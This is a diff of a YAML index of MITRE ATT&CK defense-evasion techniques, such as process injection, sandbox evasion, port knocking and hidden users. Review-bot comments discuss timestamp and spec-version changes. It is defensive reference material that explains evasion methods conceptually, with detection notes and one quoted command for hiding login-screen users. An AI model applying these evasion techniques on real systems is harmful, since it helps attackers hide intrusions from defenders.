@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
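Review bot: the Deloitte Environment Awareness reference URL changes from the bare Drive file link to the same link with `/edit` appended and its retrieved date moves to September 13, 2024; confirm the `/edit` form resolves for an anonymous reader before merging, since the earlier form is the one that was previously retrieved. As with T1578.003, the rest of this hunk is key reordering (type, id, created and external_references moved to the bottom of T1497) plus `revoked: false` and the spec version bump, so a stable key order in the generator would keep these refreshes readable.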
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
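Review bot: The `modified` timestamp moves backwards here, from 2022-05-11T14:00:00.188Z to 2022-03-11T20:38:28.802Z, and the same backward shift recurs in several later hunks (T1205.001, T1564.002, T1562.003, T1556.008, T1134.004, T1574.010, T1542.004, T1601 and T1036.001 among others). The removed values all share a `.188Z` millisecond suffix, most of them exactly `14:00:00.188Z`, which looks like a batch-normalized timestamp from whatever bundle the old index came from, while the new values are the finer-grained upstream ones. That is plausible for a source-bundle switch, but it should be called out in the PR description, and anything that sorts or filters techniques by `modified` (a "recently changed" view, for instance) will see these techniques move back by weeks to more than a year.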
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
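Review bot: Attack spec version handling is inconsistent across the objects in this hunk: T1218.005 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing re-added for it, whereas T1480 a few lines down gains `x_mitre_attack_spec_version: 3.2.0` and `revoked: false`. The same drop-without-replacement recurs for T1205.001, T1574.013, T1542.004, T1601 and T1036.001 later in the diff. If that mirrors upstream objects that predate the field it is fine, but confirm it is not the generator silently omitting the key, and check that no consumer of this index reads `spec_version`, which is removed from every technique in the file. The T1480 content change itself is consistent: a third description paragraph on user-agent filtering with a new `Trellix-Qakbot` reference, `x_mitre_version` 1.1 to 1.2, and `modified` bumped to 2024-06-07.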
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
